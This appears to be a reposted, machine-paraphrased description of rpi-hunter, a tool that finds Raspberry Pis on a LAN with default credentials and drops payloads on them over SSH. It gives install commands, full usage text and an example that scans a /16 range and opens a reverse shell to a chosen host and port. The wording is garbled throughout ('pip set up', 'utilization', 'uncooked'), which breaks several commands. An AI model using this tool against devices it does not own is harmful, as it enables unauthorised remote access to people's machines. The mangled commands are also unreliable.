Automate discovering and dropping payloads on LAN Raspberry Pi’s by way of ssh.
rpi-hunter is helpful when there are a number of Raspberry Pi‘s in your LAN with default or identified credentials, so as to automate sending instructions/payloads to them.
- Install dependencies:
sudo pip set up -U argparse termcolorand
sudo apt -y set up arp-scan tshark sshpass
- Download rpi-hunter:
git clone https://github.com/BusesCanFly/rpi-hunter
- Navigate to rpi-hunter:
- Make rpi-hunter.py executable:
chmod +x rpi-hunter.py
- One line variant:
sudo pip set up -U argparse termcolor && sudo apt -y set up arp-scan tshark sshpass && git clone https://github.com/BusesCanFly/rpi-hunter && cd ./rpi-hunter && chmod +x rpi-hunter.py
utilization: rpi-hunter.py [-h] [--list] [--no-scan] [-r IP_RANGE] [-f IP_LIST] [-c CREDS] [--payload PAYLOAD] [-H HOST] [-P PORT] [--safe] [-q] elective arguments: -h, --help present this assist message and exit --list List accessible payloads --no-scan Disable ARP scanning -r IP_RANGE IP vary to scan -f IP_LIST IP checklist to make use of (Default ./scan/RPI_list) -u UNAME Username to make use of when ssh'ing -c CREDS Password to make use of when ssh'ing --payload PAYLOAD (Name of, or uncooked) Payload [ex. reverse_shell or 'whoami'] -H HOST (If utilizing reverse_shell payload) Host for reverse shell -P PORT (If utilizing reverse_shell payload) Port for reverse shell --safe Print sshpass command, however do not execute it -q Don't print banner
- Example utilization:
./rpi-hunter.py -r 192.168.0.0/16 --payload reverse_shell -H 127.0.0.1 -P 1337
./rpi-hunter.py --listto see avalible payloads.
- Payloads might be specified by the payload title from
--listor as uncooked enter
--payload [your cli command here]